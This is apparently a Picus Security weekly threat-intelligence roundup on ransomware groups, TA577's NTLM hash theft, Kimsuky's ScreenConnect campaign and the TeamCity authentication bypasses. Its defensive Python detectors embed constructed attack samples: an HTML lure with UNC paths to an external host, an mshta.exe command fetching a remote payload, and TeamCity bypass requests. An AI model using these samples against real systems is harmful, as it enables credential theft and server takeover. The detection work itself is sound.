March 8: Top Threat Actors, Malware, Vulnerabilities and Exploits


Welcome to Picus Security's weekly cyber threat intelligence roundup! 

Each week, our goal is to provide insight into the most recent and significant malware attacks and vulnerability exploitation campaigns that could affect your industry and region. Because a blog post cannot cover every organization's threat intelligence needs, we are also introducing a new platform built to deliver customized cyber threat intelligence that addresses your specific requirements.

The new threat intelligence tool will let you identify threats targeting your region and sector, compare your security posture with that of similar organizations, and obtain easy-to-implement mitigation signatures from a variety of vendors. It also produces a report you can share with peers or within your organization, so that you stay informed and prepared to address cyber threats effectively.

March 8: Top Threat Actors Observed in the Wild

Here are the top threat actors that were active in the first week of March.

LockBit 3.0 Strikes Again: Fashion Titan Jovani in the Crosshairs

  • Threat Actor: LockBit 3.0 Ransomware Group

  • Origin of the Threat Actor: Russia 

  • Victim Location: U.S.

  • Victim & Victim Sector: Jovani Fashion & Manufacturing 

The LockBit 3.0 ransomware group has claimed Jovani Fashion, Ltd. [1] as a victim. Jovani is a New York prom and evening-wear maker founded in 1983 with reported revenue of $30.6 million. Details of the attack are not yet public: Jovani's website shows no visible disruption, and the company has not confirmed the incident. If the claim is substantiated, the impact could extend to business operations, customer relationships, and stakeholder trust, particularly if sensitive data was taken.

Image Source: Twitter

The incident is part of a recent wave in which LockBit has claimed multiple new victims, showing that the group remains a threat despite the February 2024 law-enforcement operation in which the U.S. Department of Justice and the FBI, together with the UK's National Crime Agency, seized LockBit infrastructure to disrupt its operations. The group's apparent resurgence highlights the persistence of ransomware threats and the continued need for robust defenses.

Threat Actor TA577 Abuses Windows NTLM Authentication to Capture Hashes for Pass-the-Hash Attacks on Victims' Systems

  • Threat Actor: TA577

  • Origin of the Threat Actor: Russia

  • Malware: Pikabot

  • Victim Location and Sectors: Globally

The cybercriminal group TA577 has been observed using an unusual attack chain aimed at stealing NT LAN Manager (NTLM) authentication data: emails that hijack existing threads [2] deliver zipped HTML attachments to victims.

When opened, the HTML file makes the victim's machine connect to an attacker-controlled SMB server on the Internet. Windows automatically attempts NTLM authentication to that server, so the NTLMv2 challenge/response [3] is captured without any malware being delivered; the researchers note that the server appears to run the open-source Impacket toolkit. The captured material can be cracked offline to recover the user's password or, as the researchers describe, used in "Pass-the-Hash" activities to escalate privileges and move laterally within the compromised network.

Organizations should block outbound SMB (TCP port 445) to the Internet at both perimeter firewalls and endpoints; this removes the credential leak regardless of the lure used and protects against the data breaches and intrusions that follow this kind of credential theft.
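The following scanner is an added example, not Proofpoint's or Picus's code. It inspects an HTML attachment for references that would make Windows open a UNC path or a file:// URL on an external host, the mechanism described above that triggers the NTLMv2 authentication leak. The sample attachment is constructed, and the TRUSTED_HOST_SUFFIXES value is an assumption standing in for an organization's own file servers.

```python
"""Added example (not Proofpoint's or Picus's code): scan an HTML attachment
for references that would make Windows open a UNC path or file:// URL on an
external SMB server, the mechanism that leaks an NTLMv2 challenge/response.
The sample attachment is constructed; TRUSTED_HOST_SUFFIXES is an assumption
standing in for an organization's own file servers."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes whose value a browser (or the Windows shell) will try to fetch.
FETCH_ATTRS = {"src", "href", "action", "data", "background"}
# Internal hosts a Windows client may legitimately reach over SMB (assumed).
TRUSTED_HOST_SUFFIXES = (".corp.example",)

UNC_RE = re.compile(r"^\\\\([^\\/]+)")  # \\host\share\file
META_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\";]+)", re.IGNORECASE)


def extract_host(target: str):
    """Return the host an SMB/file reference points at, or None if it is not one."""
    target = target.strip()
    m = UNC_RE.match(target)
    if m:
        return m.group(1).lower()
    if target.lower().startswith("file:"):
        # file:///C:/... has an empty netloc and is local, so it is not flagged.
        return urlparse(target).netloc.lower() or None
    return None


class SmbReferenceFinder(HTMLParser):
    """Collect (tag, attribute, host) for every attribute that resolves to an SMB host."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            if tag == "meta" and name == "content":
                # <meta http-equiv="refresh" content="0;url=file://host/share/x">
                m = META_URL_RE.search(value)
                if not m:
                    continue
                value = m.group(1)
            elif name not in FETCH_ATTRS:
                continue
            host = extract_host(value)
            if host:
                self.hits.append((tag, name, host))


def is_trusted(host: str) -> bool:
    return host.endswith(TRUSTED_HOST_SUFFIXES)


def scan_html(document: str):
    """Return references to SMB hosts outside the trusted suffixes."""
    finder = SmbReferenceFinder()
    finder.feed(document)
    finder.close()
    return [hit for hit in finder.hits if not is_trusted(hit[2])]


# Constructed sample resembling the zipped HTML lure described above.
SAMPLE_ATTACHMENT = """<html><head>
<meta http-equiv="refresh" content="0;url=file://203.0.113.5/share/invoice.txt">
</head><body>
<img src="\\\\203.0.113.5\\share\\pixel.png">
<img src="\\\\fileserver.corp.example\\logo\\logo.png">
<a href="https://example.org/">harmless link</a>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, host in scan_html(SAMPLE_ATTACHMENT):
        print(f"external SMB reference in <{tag} {attr}> -> {host}")
```

Run against the constructed sample, the scanner reports the meta refresh and the image that point at 203.0.113.5 and ignores the corporate file server and the HTTPS link. A mail gateway can apply the same check to HTML files extracted from zip attachments; it does not replace the outbound port 445 block, which stops the leak even when the lure uses a format this parser does not understand.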

The BlackCat Ransomware Group Staged an Exit Scam, Stealing $22 Million Ransom

  • Threat Actor: BlackCat/ALPHV Ransomware Group

  • Origin of the Threat Actor: Russian Speaking Operators 

  • Victim Location: U.S.

  • Victim & Victim Sector : Change Healthcare (under Optum) & Healthcare

In early March 2024, the BlackCat/ALPHV ransomware group executed an exit scam: it shut down its operations and allegedly kept a $22 million ransom that Optum had paid to prevent the release of data stolen from Change Healthcare [4]. The group first took its Tor data leak blog and negotiation servers offline, then set its status on the Tox messaging platform to 'GG' ('good game'), signaling the end of its operations, and announced that its malware source code was for sale for $5 million [5].

The exit scam unfolded amid internal strife: an affiliate who claimed responsibility for the Change Healthcare attack accused the group of withholding the affiliate's share of the ransom, triggering a public dispute on hacker forums. The affiliate issued a warning about working with the ALPHV operators: "Be careful everyone and stop deal[ing] with ALPHV [6]."

The group also posted a fake law-enforcement seizure notice, but the FBI and the NCA denied any involvement in the apparent takedown. The incident illustrates how untrustworthy ransomware operators are, even toward their own affiliates, and the complexity of extortion schemes in which large sums and critical data are at stake.

Project DDoSia: Russia's NoName057(16) Hacktivist Group Planning Massive DDoS Attacks on European Countries

  • Threat Actor: NoName057(16) Hacktivist Group

  • Origin of the Threat Actor: Russia

  • Victim Location: Ukraine, Finland, Italy (European Nations)

  • Victim Sectors: Government, Transportation and Banking

The hacktivist group NoName057(16) has been adapting its tactics during the Russia-Ukraine war, focusing on large-scale distributed denial-of-service (DDoS) attacks against Ukraine's supporters, mainly NATO member states, through its Project DDoSia initiative [7]. Researchers tracking the group's command-and-control (C2) infrastructure have observed notable changes to the DDoS client it distributes: builds for more processor architectures and operating systems, versions tailored to users in different locations (with Russian users advised to use VPNs), and stronger encryption of the traffic between clients and C2 servers.

Despite unstable C2 servers that force frequent relocation, the group's attacks have concentrated on European countries, with Ukraine, Finland, and Italy among the most affected [8]. Target selection follows geopolitical tensions and the group's intent to pressure governments that support Ukraine, and the consistent focus on the government, transportation, and banking sectors shows that the attacks aim to disrupt economic and political stability.

March 8: Latest Malware Attacks

Here are the malware attacks and campaigns that were active in the first week of March.

Kimsuky APT Exploiting ScreenConnect Vulnerabilities to Drop ToddlerShark Malware

  • Threat Actor: Kimsuky (with aliases Thallium, Velvet Chollima)

  • Origin of the Threat Actor: North Korea

  • Malware: ToddlerShark, BabyShark, ReconShark

  • CVEs: CVE-2024-1708, CVE-2024-1709

  • Victim Location: United States, Europe, Asia

Researchers have identified the North Korean APT group Kimsuky exploiting vulnerabilities in ConnectWise ScreenConnect to deploy a malware variant dubbed TODDLERSHARK, closely related to the previously known BABYSHARK malware [9].

Kimsuky exploited two ScreenConnect vulnerabilities, the authentication bypass CVE-2024-1709 and the path traversal CVE-2024-1708, to gain unauthorized access and execute code remotely. After exploitation, the attackers run commands through cmd.exe, which launches mshta.exe to fetch and execute a VBScript-based payload from a remote server [10].

The VBScript payload is heavily obfuscated, with randomly generated function and variable names and large amounts of hex-encoded strings and junk code to evade detection. It downloads and executes a second stage that modifies Windows registry keys to lower macro security settings, collects system information, and establishes persistence through scheduled tasks. The collected data is exfiltrated to the attacker's server, potentially enabling further actions against the victim.
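The detection below is an added example, not Kroll's or Picus's code. It looks for the process chain described above (a ScreenConnect process spawning cmd.exe, which spawns mshta.exe with a remote URL) in process-creation telemetry whose fields are modelled on Sysmon Event ID 1. The events are constructed, and the ScreenConnect client image name used as the root of the chain is an assumption for illustration.

```python
"""Added example (not Kroll's or Picus's code): flag the ScreenConnect -> cmd.exe
-> mshta.exe chain described above in process-creation telemetry. Event fields
are modelled on Sysmon Event ID 1 (process GUID, parent GUID, image, command
line); the events are constructed, and the ScreenConnect client image name
used as the chain's root is an assumption for illustration."""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional, Tuple

REMOTE_URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCREENCONNECT_RE = re.compile(r"^screenconnect.*\.exe$", re.IGNORECASE)


@dataclass
class ProcEvent:
    guid: str
    parent_guid: Optional[str]
    image: str          # full path of the executable
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(event: ProcEvent, by_guid: Dict[str, ProcEvent]) -> Iterator[ProcEvent]:
    """Yield the event, then each parent up to the root (cycle-safe)."""
    seen = set()
    cur: Optional[ProcEvent] = event
    while cur is not None and cur.guid not in seen:
        seen.add(cur.guid)
        yield cur
        cur = by_guid.get(cur.parent_guid) if cur.parent_guid else None


def find_suspicious_mshta(events: List[ProcEvent]) -> List[Tuple[str, str, str, List[str]]]:
    """Return (guid, severity, url, chain) for each mshta.exe that loads a remote URL.

    severity is "high" when the parent is cmd.exe and a ScreenConnect process is
    further up the tree (the chain described above), otherwise "medium".
    """
    by_guid = {e.guid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) != "mshta.exe":
            continue
        url = REMOTE_URL_RE.search(e.command_line)
        if not url:
            continue                      # local .hta files are out of scope here
        chain = [basename(a.image) for a in ancestry(e, by_guid)]
        from_screenconnect = (
            len(chain) >= 3
            and chain[1] == "cmd.exe"
            and any(SCREENCONNECT_RE.match(img) for img in chain[2:])
        )
        severity = "high" if from_screenconnect else "medium"
        findings.append((e.guid, severity, url.group(0), chain))
    return findings


# Constructed telemetry: one exploitation chain, one benign local mshta run,
# and one stand-alone remote mshta launch that still merits a look.
SAMPLE_EVENTS = [
    ProcEvent("g1", None,
              r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
              "ScreenConnect.ClientService.exe"),
    ProcEvent("g2", "g1", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c mshta.exe http://203.0.113.7/assets/update.hta"),
    ProcEvent("g3", "g2", r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://203.0.113.7/assets/update.hta"),
    ProcEvent("g4", None, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("g5", "g4", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\alice\AppData\Local\Temp\setup.hta"),
    ProcEvent("g6", "g4", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://198.51.100.9/a.hta"),
]

if __name__ == "__main__":
    for guid, severity, url, chain in find_suspicious_mshta(SAMPLE_EVENTS):
        print(f"[{severity}] {guid}: mshta.exe fetched {url} via {' <- '.join(chain)}")
```

The chain walk is what distinguishes exploitation from routine administration: mshta.exe loading a remote URL is suspicious on its own (medium), but the same command with a ScreenConnect process two or more levels up matches the post-exploitation behavior described above and is rated high.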

UNC1549's Tortoiseshell Hacking Campaign Installs Two Unique Backdoors: MINIBIKE and MINIBUS

  • Threat Actor: UNC1549

  • Origin of the Threat Actor: Iran

  • Malware: MINIBIKE and MINIBUS Backdoors

  • Victim Location: Israel, UAE, Türkiye, India and Albania

  • Victim Sectors: Aerospace, Aviation, and Defense Industries 

An ongoing cyber-espionage campaign attributed to an Iranian group tracked as UNC1549, which overlaps with the Tortoiseshell operation [11], targets aerospace, aviation, and defense organizations across the Middle East, particularly in Israel and the UAE, with possible activity extending to Türkiye, India, and Albania.

Active since at least June 2022, the campaign uses two previously undocumented backdoors, MINIBIKE and MINIBUS, to infiltrate targets and gather intelligence. MINIBIKE, seen from June 2022 until at least October 2023, supports file exfiltration and command execution and uses Microsoft Azure cloud infrastructure to blend in with legitimate traffic. MINIBUS, introduced in August 2023 and observed as recently as January 2024, offers a more flexible code-execution interface and improved reconnaissance functionality. Together with a custom tunneler known as LIGHTRAIL, these tools support the campaign's effort to stealthily penetrate and spy on sectors of strategic interest to Iran.

March 8: Latest Vulnerabilities and Exploits

Here are the latest vulnerabilities and exploits observed in the first week of March.

CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Authentication Bypass Vulnerabilities Posing a Critical Risk

CVE-2024-27198 is a critical authentication bypass (CVSS 9.8) in JetBrains TeamCity caused by a flaw in the BaseController class of the web-openapi.jar library [12]. When a request to a non-existent path carries a specially crafted 'jsp' parameter whose value ends with the ".jsp" extension, the server forwards the request to the internal endpoint named in that parameter without applying authentication. An unauthenticated attacker can use this to reach administrative REST endpoints, for example sending a crafted HTTP POST request to create a new administrator account, and then execute arbitrary code with administrator privileges, gaining full control of the TeamCity CI/CD server.

CVE-2024-27199 (CVSS 7.3) is less severe but still allows unauthenticated information disclosure and limited system modification through a relative path traversal weakness (CWE-23) affecting several endpoints. A request containing a double-dot segment ("/../") can reach authenticated pages and settings; for example, an attacker could read diagnostic information or upload a malicious HTTPS certificate to the TeamCity server without authenticating. Both flaws underline the need for strict input validation and for authentication checks that cannot be sidestepped by path manipulation.
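The log scanner below is an added example, not JetBrains', Rapid7's or Picus's code. It reads web-server access log lines in front of a TeamCity instance and flags requests shaped like the two bypasses described above: a 'jsp' query parameter whose value ends in ".jsp" and, once the ";" path parameter is stripped, names an authenticated endpoint (CVE-2024-27198), and a path whose ".." segments resolve under /admin/ or /app/https/ (CVE-2024-27199). The log lines and client addresses are constructed, and the list of prefixes treated as sensitive is an assumption.

```python
"""Added example (not JetBrains', Rapid7's or Picus's code): scan web-server
access logs for requests shaped like the two TeamCity bypasses described above.
  CVE-2024-27198: a "jsp" query parameter whose value ends in ".jsp" and, once
  the ";" path parameter is stripped, names an authenticated endpoint.
  CVE-2024-27199: a path with a ".." segment that resolves under /admin/ or
  /app/https/.
Log lines and client addresses are constructed; the endpoint prefixes treated
as sensitive are an assumption."""
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Endpoints that must never be reachable without authentication (assumed list).
SENSITIVE_PREFIXES = ("/app/rest/", "/admin/", "/app/https/")


def query_params(query: str) -> dict:
    """Split on '&' only; ';' stays part of the value (older parse_qs split on it)."""
    params: dict = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote(key), []).append(unquote(value))
    return params


def normalised_path(raw_path: str) -> str:
    """Decode percent-encoding, drop ';' path parameters, collapse '..' segments."""
    decoded = unquote(raw_path)
    stripped = "/".join(seg.split(";", 1)[0] for seg in decoded.split("/"))
    return normpath(stripped)


def check_27198(target: str):
    parts = urlsplit(target)
    for value in query_params(parts.query).get("jsp", []):
        dest = value.split(";", 1)[0]
        if value.lower().endswith(".jsp") and dest.startswith(SENSITIVE_PREFIXES):
            return f"CVE-2024-27198: unauthenticated forward to {dest} via jsp parameter"
    return None


def check_27199(target: str):
    raw_path = urlsplit(target).path
    if ".." not in unquote(raw_path):
        return None
    resolved = normalised_path(raw_path)
    if resolved.startswith(SENSITIVE_PREFIXES):
        return f"CVE-2024-27199: traversal {raw_path} resolves to {resolved}"
    return None


def scan_access_log(lines):
    """Return (ip, method, target, message) for every matching request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for check in (check_27198, check_27199):
            msg = check(m["target"])
            if msg:
                findings.append((m["ip"], m["method"], m["target"], msg))
    return findings


# Constructed log lines in Common Log Format.
SAMPLE_LOG = [
    '203.0.113.10 - - [05/Mar/2024:10:15:01 +0000] "POST /hax?jsp=/app/rest/users;.jsp HTTP/1.1" 200 812',
    '203.0.113.10 - - [05/Mar/2024:10:15:07 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 4410',
    '203.0.113.10 - - [05/Mar/2024:10:15:12 +0000] "POST /update/../app/https/settings/uploadCertificate HTTP/1.1" 200 77',
    '198.51.100.4 - - [05/Mar/2024:10:16:00 +0000] "GET /login.html HTTP/1.1" 200 5120',
    '198.51.100.4 - - [05/Mar/2024:10:16:03 +0000] "GET /app/rest/server HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for ip, method, target, msg in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {method} {target}\n    {msg}")
```

Two design choices matter here. The query string is split on "&" only, because some parse_qs versions also split on ";", which would hide the ";.jsp" suffix that the bypass relies on. Paths are percent-decoded and stripped of ";" parameters before normalization, so "/res/%2e%2e/admin/" and "/res/..;/admin/" are caught as well as the plain "/res/../admin/" form. A 200 response on any flagged line indicates the instance was unpatched when the request arrived, and the created user list and HTTPS certificate store should be reviewed.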

CVE-2024-23225 & CVE-2024-23296: Apple Issues Critical Updates for Actively Exploited Zero-Day Flaws

Apple has issued critical security updates [13] to address two zero-day vulnerabilities, CVE-2024-23225 and CVE-2024-23296, that have been actively exploited [14]. 

CVE-2024-23225 is a memory corruption issue in the kernel, and CVE-2024-23296 is a memory corruption issue in the RTKit real-time operating system (RTOS). In both cases, an attacker who already has arbitrary kernel read and write capability may be able to bypass kernel memory protections, so the flaws are most likely used as a late stage of an exploit chain rather than as an initial entry point. Apple has not disclosed how they are being exploited in the wild.

Apple fixed both issues with improved validation in iOS 17.4 and iPadOS 17.4 and, for older devices such as the iPhone 8 and the 5th-generation iPad, in iOS 16.7.6 and iPadOS 16.7.6. This follows Apple's January 2024 fix for an actively exploited type confusion issue in WebKit. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added both CVEs to its Known Exploited Vulnerabilities catalog, underscoring the urgency of applying the updates.

References

[1] S. Jain, “LockBit Hits Again: Renowned Fashion Brand Jovani Targeted in Ransomware Attack,” The Cyber Express, Mar. 04, 2024. Available: https://thecyberexpress.com/cyberattack-on-jovani-fashion/. [Accessed: Mar. 06, 2024]

[2] A. Mascellino, “TA577 Exploits NTLM Authentication Vulnerability,” Infosecurity Magazine, Mar. 04, 2024. Available: https://www.infosecurity-magazine.com/news/ta577-exploits-ntlm-authentication/. [Accessed: Mar. 06, 2024]

[3] “TA577’s Unusual Attack Chain Leads to NTLM Data Theft,” Proofpoint, Feb. 29, 2024. Available: https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft. [Accessed: Mar. 06, 2024]

[4] I. Ilascu, “BlackCat ransomware turns off servers amid claim they stole $22 million ransom,” BleepingComputer, Mar. 04, 2024. Available: https://www.bleepingcomputer.com/news/security/blackcat-ransomware-turns-off-servers-amid-claim-they-stole-22-million-ransom/. [Accessed: Mar. 06, 2024]

[5] I. Ilascu, “BlackCat ransomware shuts down in exit scam, blames the ‘feds,’” BleepingComputer, Mar. 05, 2024. Available: https://www.bleepingcomputer.com/news/security/blackcat-ransomware-shuts-down-in-exit-scam-blames-the-feds/. [Accessed: Mar. 06, 2024]

[6] J. Lyons, “Change Healthcare attack latest: ALPHV bags $22M in Bitcoin amid affiliate drama,” The Register, Mar. 04, 2024. Available: https://www.theregister.com/2024/03/04/alphv_ransom_payment/. [Accessed: Mar. 06, 2024]

[7] “Project DDoSia - Russian Hackers ‘NoName057(16)’ Planning Massive DDoS Attack,” Cyber Security News, Mar. 05, 2024. Available: https://cybersecuritynews.com/roject-ddosia-noname05716-massive-ddos-attack/. [Accessed: Mar. 06, 2024]

[8] A. Mascellino, “Hacktivist Collective NoName057(16) Strikes European Targets,” Infosecurity Magazine, Mar. 04, 2024. Available: https://www.infosecurity-magazine.com/news/hacktivist-collective-noname057/. [Accessed: Mar. 06, 2024]

[9] B. Toulas, “ScreenConnect flaws exploited to drop new ToddlerShark malware,” BleepingComputer, Mar. 04, 2024. Available: https://www.bleepingcomputer.com/news/security/screenconnect-flaws-exploited-to-drop-new-toddlershark-malware/. [Accessed: Mar. 06, 2024]

[10] K. Wojcieszek, G. Glass, and D. Truman, “TODDLERSHARK: ScreenConnect Vulnerability Exploited to Deploy BABYSHARK Variant,” Kroll. Available: https://www.kroll.com/en/insights/publications/cyber/screenconnect-vulnerability-exploited-to-deploy-babyshark. [Accessed: Mar. 06, 2024]

[11] J. Warminsky, “Suspected Iranian cyber-espionage campaign targets Middle East aerospace, defense industries.” Available: https://therecord.media/iran-cyber-espionage-campaign-targeting-middle-east-defense-aerospace. [Accessed: Mar. 06, 2024]

[12] H. C. Yuceel, “CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Authentication Bypass Vulnerabilities Explained,” Mar. 06, 2024. Available: https://www.picussecurity.com/resource/blog/cve-2024-27198-cve-2024-27199. [Accessed: Mar. 06, 2024]

[13] “About the security content of iOS 17.4 and iPadOS 17.4,” Apple Support, Mar. 05, 2024. Available: https://support.apple.com/en-us/HT214081. [Accessed: Mar. 06, 2024]

[14] 2024newsroom Mar 06, “Urgent: Apple Issues Critical Updates for Actively Exploited Zero-Day Flaws,” The Hacker News, Mar. 06, 2024. Available: https://thehackernews.com/2024/03/urgent-apple-issues-critical-updates.html. [Accessed: Mar. 06, 2024]